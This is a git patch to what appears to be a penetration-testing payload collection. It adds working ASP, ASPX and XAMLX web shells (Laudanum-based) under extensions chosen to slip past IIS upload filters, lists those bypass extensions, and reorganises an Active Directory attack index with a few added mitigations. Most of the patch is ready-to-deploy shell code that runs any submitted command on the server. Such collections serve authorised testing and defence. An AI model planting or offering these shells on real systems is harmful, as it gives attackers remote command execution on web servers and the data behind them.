From 00684a10cdd79246da13b34678fdb4f3161ccb77 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 16 Nov 2019 14:53:42 +0100
Subject: [PATCH] IIS asp shell with .asa, .cer, .xamlx
---
 .../Active Directory Attack.md | 106 ++++++++------
 .../Configuration IIS web.config/web.config | 2 +-
 Upload Insecure Files/Extension ASP/shell.asa | 83 +++++++++++
 .../Extension ASP/shell.asmx | 83 +++++++++++
 Upload Insecure Files/Extension ASP/shell.asp | 83 +++++++++++
 .../Extension ASP/shell.aspx | 129 ++++++++++++++++++
 Upload Insecure Files/Extension ASP/shell.cer | 83 +++++++++++
 .../Extension ASP/shell.xamlx | 16 +++
 Upload Insecure Files/README.md | 2 +-
 9 files changed, 547 insertions(+), 40 deletions(-)
 create mode 100644 Upload Insecure Files/Extension ASP/shell.asa
 create mode 100644 Upload Insecure Files/Extension ASP/shell.asmx
 create mode 100644 Upload Insecure Files/Extension ASP/shell.asp
 create mode 100644 Upload Insecure Files/Extension ASP/shell.aspx
 create mode 100644 Upload Insecure Files/Extension ASP/shell.cer
 create mode 100644 Upload Insecure Files/Extension ASP/shell.xamlx
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 57f9df3..d0ad6c7 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -2,44 +2,64 @@ ## Summary
-* [Tools](#tools)
-* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
- * [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
- * [Open Shares](#open-shares)
- * [SCF file attack against writeable share](#scf-file-attack-against-writeable-share)
- * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
- * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
- * Using ndtsutil
- * Using Vshadow
- * Using vssadmin
- * Using DiskShadow
- * Using Mimikatz DCSync
- * Using Mimikatz sekurlsa
- * [Password spraying](#password-spraying)
- * [Password in AD User comment](#password-in-ad-user-comment)
- * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
- * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
- * [Kerberoasting](#kerberoasting)
- * [KRB_AS_REP roasting](#krb_as_rep-roasting)
- * [Pass-the-Hash](#pass-the-hash)
- * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
- * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
- * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
- * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
- * [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
- * [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
- * [Drop the MIC](#drop-the-mic)
- * [Ghost Potato](#ghost-potato)
- * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- * [Trust relationship between domains](#trust-relationship-between-domains)
- * [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- * [Unconstrained delegation](#unconstrained-delegation)
- * [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
- * [Relay delegation with mitm6](#relay-delegation-with-mitm6)
- * [PrivExchange attack](#privexchange-attack)
- * [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
- * [PXE Boot image attack](#pxe-boot-image-attack)
- * [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
+- [Active Directory Attacks](#active-directory-attacks)
+ - [Summary](#summary)
+ - [Tools](#tools)
+ - [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
+ - [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
+ - [Open Shares](#open-shares)
+ - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
+ - [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
+ - [Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
+ - [Using ndtsutil](#using-ndtsutil)
+ - [Using Vshadow](#using-vshadow)
+ - [Using vssadmin](#using-vssadmin)
+ - [Using DiskShadow (a Windows signed binary)](#using-diskshadow-a-windows-signed-binary)
+ - [Using esentutl.exe](#using-esentutlexe)
+ - [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit)
+ - [Alternatives - modules](#alternatives---modules)
+ - [Using Mimikatz DCSync](#using-mimikatz-dcsync)
+ - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
+ - [Password spraying](#password-spraying)
+ - [Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.](#using-kerbrute-a-tool-to-perform-kerberos-pre-auth-bruteforcing)
+ - [Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.](#using-crackmapexec-and-mp64-to-generate-passwords-and-spray-them-against-smb-services-on-the-network)
+ - [Using RDPassSpray to target RDP services.](#using-rdpassspray-to-target-rdp-services)
+ - [Using [hydra]() and [ncrack]() to target RDP services.](#using-hydra-and-ncrack-to-target-rdp-services)
+ - [Password in AD User comment](#password-in-ad-user-comment)
+ - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
+ - [Using Mimikatz](#using-mimikatz)
+ - [Using Meterpreter](#using-meterpreter)
+ - [Using a ticket on Linux](#using-a-ticket-on-linux)
+ - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
+ - [Kerberoasting](#kerberoasting)
+ - [KRB_AS_REP Roasting](#krbasrep-roasting)
+ - [Pass-the-Hash](#pass-the-hash)
+ - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
+ - [Using impacket](#using-impacket)
+ - [Using Rubeus](#using-rubeus)
+ - [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
+ - [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
+ - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
+ - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
+ - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
+ - [Drop the MIC](#drop-the-mic)
+ - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
+ - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
+ - [Trust relationship between domains](#trust-relationship-between-domains)
+ - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
+ - [Unconstrained delegation](#unconstrained-delegation)
+ - [Find delegation](#find-delegation)
+ - [Monitor with Rubeus](#monitor-with-rubeus)
+ - [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
+ - [Load the ticket](#load-the-ticket)
+ - [Mitigation](#mitigation)
+ - [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
+ - [Relay delegation with mitm6](#relay-delegation-with-mitm6)
+ - [PrivExchange attack](#privexchange-attack)
+ - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab)
+ - [PXE Boot image attack](#pxe-boot-image-attack)
+ - [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
+ - [References](#references)
 ## Tools
@@ -824,6 +844,16 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
 $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
 ```
+Mitigations:
+
+ * Disable LLMNR via group policy
+ ```powershell
+ Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled
+ ```
+ * Disable NBT-NS
+ ```powershell
+ This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP
+ ```
 #### SMB Signing Disabled and IPv6
diff --git a/Upload Insecure Files/Configuration IIS web.config/web.config b/Upload Insecure Files/Configuration IIS web.config/web.config
index 7036fdc..c14f37e 100644
--- a/Upload Insecure Files/Configuration IIS web.config/web.config
+++ b/Upload Insecure Files/Configuration IIS web.config/web.config
@@ -2,7 +2,7 @@ -
diff --git a/Upload Insecure Files/Extension ASP/shell.asa b/Upload Insecure Files/Extension ASP/shell.asa
new file mode 100644
index 0000000..b2caf59
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.asa
@@ -0,0 +1,83 @@ +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** Updated and fixed by Robin Wood +' *** Updated and fixed by Tim Medin "1.2.3.4" then + response.Status="404 Page Not Found" + response.Write(response.Status) + response.End +end if + +if Request.Form("submit") <> "" then + Dim wshell, intReturn, strPResult + cmd = Request.Form("cmd") + Response.Write ("Running command: " & cmd & "
") + set wshell = CreateObject("WScript.Shell") + Set objCmd = wShell.Exec(cmd) + strPResult = objCmd.StdOut.Readall() + + response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" + + set wshell = nothing +end if + +%> + +Laundanum ASP Shell + +
+Command:
+ +

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. +

Example command to do a directory listing:
+%ComSpec% /c dir +

+
+
+Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
+Get the latest version at laudanum.secureideas.net. +
+ + \ No newline at end of file diff --git a/Upload Insecure Files/Extension ASP/shell.asmx b/Upload Insecure Files/Extension ASP/shell.asmx new file mode 100644 index 0000000..b2caf59 --- /dev/null +++ b/Upload Insecure Files/Extension ASP/shell.asmx @@ -0,0 +1,83 @@ +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** Updated and fixed by Robin Wood +' *** Updated and fixed by Tim Medin "1.2.3.4" then + response.Status="404 Page Not Found" + response.Write(response.Status) + response.End +end if + +if Request.Form("submit") <> "" then + Dim wshell, intReturn, strPResult + cmd = Request.Form("cmd") + Response.Write ("Running command: " & cmd & "
") + set wshell = CreateObject("WScript.Shell") + Set objCmd = wShell.Exec(cmd) + strPResult = objCmd.StdOut.Readall() + + response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" + + set wshell = nothing +end if + +%> + +Laundanum ASP Shell + +
+Command:
+ +

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. +

Example command to do a directory listing:
+%ComSpec% /c dir +

+
+
+Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
+Get the latest version at laudanum.secureideas.net. +
+ + \ No newline at end of file diff --git a/Upload Insecure Files/Extension ASP/shell.asp b/Upload Insecure Files/Extension ASP/shell.asp new file mode 100644 index 0000000..b2caf59 --- /dev/null +++ b/Upload Insecure Files/Extension ASP/shell.asp @@ -0,0 +1,83 @@ +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** Updated and fixed by Robin Wood +' *** Updated and fixed by Tim Medin "1.2.3.4" then + response.Status="404 Page Not Found" + response.Write(response.Status) + response.End +end if + +if Request.Form("submit") <> "" then + Dim wshell, intReturn, strPResult + cmd = Request.Form("cmd") + Response.Write ("Running command: " & cmd & "
") + set wshell = CreateObject("WScript.Shell") + Set objCmd = wShell.Exec(cmd) + strPResult = objCmd.StdOut.Readall() + + response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" + + set wshell = nothing +end if + +%> + +Laundanum ASP Shell + +
+Command:
+ +

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. +

Example command to do a directory listing:
+%ComSpec% /c dir +

+
+
+Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
+Get the latest version at laudanum.secureideas.net. +
+ + \ No newline at end of file diff --git a/Upload Insecure Files/Extension ASP/shell.aspx b/Upload Insecure Files/Extension ASP/shell.aspx new file mode 100644 index 0000000..5de53ad --- /dev/null +++ b/Upload Insecure Files/Extension ASP/shell.aspx @@ -0,0 +1,129 @@ +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> + + + +Laundanum ASPX Shell + + +
+cmd /c +
+STDOUT:
+
<% = stdout.Replace("<", "<") %>
+
+
+
+STDERR:
+
<% = stderr.Replace("<", "<") %>
+ + +
+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + \ No newline at end of file diff --git a/Upload Insecure Files/Extension ASP/shell.cer b/Upload Insecure Files/Extension ASP/shell.cer new file mode 100644 index 0000000..b2caf59 --- /dev/null +++ b/Upload Insecure Files/Extension ASP/shell.cer @@ -0,0 +1,83 @@ +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** Updated and fixed by Robin Wood +' *** Updated and fixed by Tim Medin "1.2.3.4" then + response.Status="404 Page Not Found" + response.Write(response.Status) + response.End +end if + +if Request.Form("submit") <> "" then + Dim wshell, intReturn, strPResult + cmd = Request.Form("cmd") + Response.Write ("Running command: " & cmd & "
") + set wshell = CreateObject("WScript.Shell") + Set objCmd = wShell.Exec(cmd) + strPResult = objCmd.StdOut.Readall() + + response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" + + set wshell = nothing +end if + +%> + +Laundanum ASP Shell + +
+Command:
+ +

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. +

Example command to do a directory listing:
+%ComSpec% /c dir +

+
+
+Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
+Get the latest version at laudanum.secureideas.net. +
+ + \ No newline at end of file diff --git a/Upload Insecure Files/Extension ASP/shell.xamlx b/Upload Insecure Files/Extension ASP/shell.xamlx new file mode 100644 index 0000000..ab0da0f --- /dev/null +++ b/Upload Insecure Files/Extension ASP/shell.xamlx @@ -0,0 +1,16 @@ + + + + + + + + + + [System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()] + + + + + + \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 82347ce..6229f86 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -46,7 +46,7 @@ Double extensions ### Other extensions ```powershell -asp : .asp, .aspx +asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0) perl: .pl, .pm, .cgi, .lib jsp : .jsp, .jspx, .jsw, .jsv, .jspf Coldfusion: .cfm, .cfml, .cfc, .dbm